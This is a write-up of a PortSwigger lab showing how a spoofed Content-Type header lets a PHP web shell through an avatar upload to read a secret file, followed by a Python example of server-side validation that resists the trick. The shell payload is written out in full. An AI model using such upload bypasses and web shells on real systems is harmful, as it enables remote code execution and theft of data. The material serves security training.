PortSwigger Lab: Web shell upload via Content-Type restriction bypass | WalkThrough

Introduction

Hello everyone, in this post I am going to share the writeup of the PortSwigger lab "Web shell upload via Content-Type restriction bypass". After signing in to the wiener account we will see an avatar upload function that does not allow files with the application/x-php content type. By changing the Content-Type header, we can upload our web shell and get code execution on the machine. We can then read the contents of /home/carlos/secret and solve the lab.

Objective

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Detection

Log in with the given credentials wiener:peter.

Under the My Account section there is an Avatar upload function. We will upload a PHP web shell in this field. Before sending the exploit code, let's send this PHP code first.

<?php phpinfo(); ?>

As we can see, the website is not allowing the application/x-php content type, so we need to change the Content-Type header of the uploaded part to either image/png or image/jpeg.

The file has been successfully uploaded. To access the file, right-click on wiener's profile photo and click on "View Image".
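As an added example (not code from the lab or from the original post), the following contrasts the lab's flawed logic, which trusts the client-supplied Content-Type, with a hardened validator that ignores the header and inspects the file itself; the sample bytes and function names are constructed for illustration.

```python
import os
import re

# Constructed samples for the lab scenario: the PHP shell from the walkthrough
# declared as image/png, and a genuine PNG signature with padding bytes.
PHP_SHELL = b'<?php system("cat /home/carlos/secret"); ?>'
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

# Extension allowlist mapped to the MIME type each extension must contain.
ALLOWED_EXT = {".png": "image/png", ".jpg": "image/jpeg", ".jpeg": "image/jpeg"}
# File signatures ("magic bytes") used to identify the real content.
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff"}


def weak_check(filename, declared_type, data):
    """The lab's flawed logic: accepts whatever Content-Type the client sends."""
    return declared_type in ("image/png", "image/jpeg")


def sniff_type(data):
    """Derive the type from the first bytes of the file, not from the request."""
    for mime, signature in MAGIC.items():
        if data.startswith(signature):
            return mime
    return None


def hardened_check(filename, declared_type, data):
    """Server-side validation that never uses the client-supplied type."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False  # no .php, .phtml or other executable extensions
    sniffed = sniff_type(data)
    if sniffed is None or sniffed != ALLOWED_EXT[ext]:
        return False  # content signature must match the extension
    if re.search(rb"<\?php|<\?=", data):
        return False  # reject PHP open tags even inside a valid image
    return True
```

Even with this check, store uploads outside any directory where the web server executes scripts, since a file with a valid image header can still carry PHP code.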

Exploitation

Now let's send the exploit PHP code.

<?php
system("cat /home/carlos/secret");
?>

We now have successful RCE on the machine. Now submit this secret to solve the lab.

eJPT | eCPPT | DarkArmy CTF Player

WraithOP